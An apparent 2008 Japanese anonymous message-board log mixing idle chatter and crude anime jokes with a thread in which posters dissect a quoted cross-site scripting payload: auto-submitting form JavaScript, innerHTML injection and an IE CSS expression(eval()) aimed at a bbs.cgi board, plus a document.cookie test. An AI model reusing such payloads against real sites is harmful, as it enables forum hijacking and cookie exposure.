今日は寒いね(´ー｀;)

> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？

むしろさっさといなくなって欲しい連中ばかりだろ(;´Д`)

参考：2008/09/27(土)05時42分55秒

> > eval
> それはわかるがSubmitが2行目で実行されてるからvに対して数値が入って投稿されるそのｺｰﾄﾞ
> 自体がその下にあるEvalで実行される理由がわからん･･･
> とにかく寝て起きたらﾃｽﾄしてみよう(;´Д`)もう駄目眠い

submitを含むJavascriptのｺｰﾄﾞはhiddenなﾌｨｰﾙﾄﾞのvalueに単なる文字列として設定されるだけ
evalでそのﾌｨｰﾙﾄﾞに書かれているjavascriptを実行させている

参考：2008/09/27(土)05時48分03秒

> 半袖短パンでお外出たら寒かったんだけど(;´Д`)

そろそろエアコンをとめようかな(;´Д`)

参考：2008/09/27(土)05時50分00秒

半袖短パンでお外出たら寒かったんだけど(;´Д`)

> > えっ、しないの？(;´ω`)
> ｼｮﾀは嫌いじゃないけどこれは淡泊すぎるな(;´Д`)
> こう公園で幼稚園児がきゃーきゃーいって普通に遊んで戯れてる位の印象で
> まったく性とかを感じられない

ﾋﾟｺの1を流そうかと思ったがもう眠いな。(;´ω`)ｱﾚは最後もう上連雀の世界だったけど

参考：2008/09/27(土)05時47分06秒

> > これは推測だけど、投稿文字列が数字だけだったことを考えると、
> > 実際ｺｰﾄﾞとして機能してるのって
> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
> > ただのｺﾞﾐなんじゃないかしらん。
> > でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。
> eval

それはわかるがSubmitが2行目で実行されてるからvに対して数値が入って投稿されるそのｺｰﾄﾞ
自体がその下にあるEvalで実行される理由がわからん･･･
とにかく寝て起きたらﾃｽﾄしてみよう(;´Д`)もう駄目眠い

参考：2008/09/27(土)05時42分53秒

> > ところでﾔｸｻﾞはこれで射精するの？(;´Д`)
> えっ、しないの？(;´ω`)

ｼｮﾀは嫌いじゃないけどこれは淡泊すぎるな(;´Д`)
こう公園で幼稚園児がきゃーきゃーいって普通に遊んで戯れてる位の印象で
まったく性とかを感じられない

参考：2008/09/27(土)05時45分58秒

> えここ終わった？(;´Д`)

寝ます。(;´ω`)PCはつけっぱなしだからなんか垂れ流すのは可能だが

参考：2008/09/27(土)05時45分56秒

> > 今日のﾛｸﾞを。(;´ω`)
> > 眠い
> ところでﾔｸｻﾞはこれで射精するの？(;´Д`)

えっ、しないの？(;´ω`)

参考：2008/09/27(土)05時45分04秒

えここ終わった？(;´Д`)

> > 表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際ｺｰﾄﾞとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
> ただのｺﾞﾐなんじゃないかしらん。
> でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

その辺のｺｰﾄﾞはinnerHTML=で代入される
実行部分はstyle={...}

参考：2008/09/27(土)05時38分08秒

> > 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？
> 今日のﾛｸﾞを。(;´ω`)
> 眠い

ところでﾔｸｻﾞはこれで射精するの？(;´Д`)

参考：2008/09/27(土)05時44分12秒

> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？

今日のﾛｸﾞを。(;´ω`)
眠い

参考：2008/09/27(土)05時42分55秒

> 寝ます。(;´ω`)

漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ！？

参考：2008/09/27(土)05時41分56秒

> > 表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際ｺｰﾄﾞとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
> ただのｺﾞﾐなんじゃないかしらん。
> でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

eval

参考：2008/09/27(土)05時38分08秒

> 寝ます。(;´ω`)

一日中ｴﾛｱﾆﾒ転送でもするのかと思った(;´Д`)

参考：2008/09/27(土)05時41分56秒

寝ます。(;´ω`)

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> 表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
> 分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)

これは推測だけど、投稿文字列が数字だけだったことを考えると、
実際ｺｰﾄﾞとして機能してるのって

mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();

だけだと思う。submit()走っちゃってるからﾍﾟｰｼﾞ遷移がおこっちゃうので下のｺｰﾄﾞは
ただのｺﾞﾐなんじゃないかしらん。
でもさすがにｴｽｹｰﾌﾟ対策してるから、いったいこのJSがどこで走ってたのかが気になる。

参考：2008/09/27(土)05時32分48秒

> えここのエロアニメが紙芝居だよ(;´Д`)

うちはそうでもないな(;´Д`)しょぼいAtomと1GBﾒﾓﾘだけど

参考：2008/09/27(土)05時36分42秒

なんだよホモアニメじゃねえか

あーやっとわかった(;´Д`)
　"http://(略)/bbs.cgi&渡したい物"
って事かぁ
普通の構文じゃないデスかぁー

えここのエロアニメが紙芝居だよ(;´Д`)

寝るか(;´Д`)ｼﾐ

こんな時間なのに38人もいるぜ

生き残りたい(;´Д`)生き残りたい

> 訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
> http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

個人指導はどうしようもないよね(;´Д`)個人差がありすぎる

参考：2008/09/27(土)05時32分34秒

はぁ(;´Д`)Shintani

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

オキュメントって物があるのかもしれない！

参考：2008/09/27(土)05時32分16秒

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

それは俺が加工する際に消しちゃっただけだよ(;´Д`)

参考：2008/09/27(土)05時32分16秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)

参考：2008/09/27(土)05時22分23秒

訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> つまりコードをGETで渡されてうかつにも実行しちゃったって事？

ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
数字がでてたことになるね。
でもコードが嫌に不完全なんだよね・・・ ocumentとか。

参考：2008/09/27(土)05時26分58秒

> > 俺も前まで勘違いしてたんだが
> > くずははCookie使ってないんだわ
> > ただ投稿時の名前を保持してるだけ
> まじで(;´Д`)

その状態でjavascript:alert(document.cookie);
ってｱﾄﾞﾚｽﾊﾞｰに入れてｴﾝﾀｰ押せば解りやすい

参考：2008/09/27(土)05時29分05秒